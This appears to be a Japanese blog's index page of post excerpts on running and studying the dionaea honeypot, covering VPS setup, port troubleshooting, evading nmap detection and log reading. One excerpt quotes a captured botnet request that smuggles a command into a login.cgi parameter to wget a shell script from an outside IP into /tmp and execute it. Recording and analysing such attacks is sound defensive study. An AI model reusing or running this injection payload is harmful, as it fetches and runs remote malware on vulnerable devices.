セキュリティ系の勉強、その他開発メモとか雑談. GithubはUnity触っていた頃ものがメイン Twitterフォローもよろしくです

dionaea

HAKAIボットネットからの攻撃と思われるログ(2018-9-24)

短めです。下のログはdionaeaで検知したログ。スペースと改行の表記がうまくできていないのはご了承ください。 stream = [('in', b'GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77.250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1\x0…

dionaeaのログをちょっと見てみる1

初めに ログを見たり、知識なんてものもない人がゆっくりとログを見ていくだけです。間違ってることの方が多いかもですが、こういうことで慣れていかないといつまで経っても進まないので、、とりあえずhttpの通信記録を少し見てみる。 1 /opt/dionaea/var/di…

dionaeaのサービスを見てみる

とりあえず、公式のこのページを参考に1つずつ見ていけたらなぁと思ってます。 Service — dionaea 0.8.0 documentation その前に 外部からnmapをした時に、dionaeaとバレてしまう可能性があるのでそれを修正します。参考サイトはこちらです。 # nmap ipアド…

dionaeaのVPSのポートがclosedばっかり - ハニーポットのポートが開かない

先日dionaeaをVPSに導入し、早く攻撃来ないかなとか思ってたんですが、全く来ないしログも増えない。すぐにおかしいなと思って、自分(VPS内から)をnmapでポートスキャン。 次に外部(自宅環境)からポートスキャン。 外から見るとポートが閉じてますね。他の方…

今更さくらVPS借りてパニーポット(dionaea)

タイトル通り。 T-Potとかいうdionaeaとかを含んでなおかつログ等もうまい具合に可視化してくれるとかいう高級なものはのちに利用するとして、今回は自分でログとかを見ることを目的にdionaeaを入れます。 VPSを契約する & OS設定 vps.sakura.ad.jp とりあえ…